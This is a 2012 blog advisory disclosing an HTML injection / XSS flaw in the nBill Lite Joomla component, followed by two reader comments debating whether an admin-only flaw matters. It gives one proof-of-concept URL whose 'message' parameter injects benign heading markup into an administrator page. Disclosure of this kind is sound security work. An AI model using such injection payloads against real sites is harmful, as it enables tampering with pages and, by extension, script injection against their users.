Thursday, 26 April 2012

[EN] nBill Lite - Joomla component HTML Injection / XSS


[ TITLE ....... ][ nBill Lite - Joomla component HTML Injection / XSS
[ DATE ........ ][ 07.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://
[ VERSION ..... ][
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice component for Joomla, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
HTML Injection.

[--------------------------------------------[
[ 3. Where is bug :)
http://joomla/administrator/index.php?option=com_nbill&action=income&task=generated-view&message=[url%3d%27%3E%3Ch1%3Etestuj%3Cbr%3Etestuj2%3C%2fh1%3E]test%3Cbr%3E123[%2furl]

*Tested from admin only!*
[--------------------------------------------[
[ 4. More...

- http://www.joomla.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ All questions about new projects @ mail now :)
]
[ Best regards
[

3 comments:

  1. This is not a vulnerability. Only administrators can access the affected page and they already have full access to do anything they like on your site anyway!

    ReplyDelete
  2. Here is said, this was tested only from admin user.
    Second: if Joomla is vulnerable anywhere else, then csrf is possible. and so on...

    ReplyDelete

What do You think...?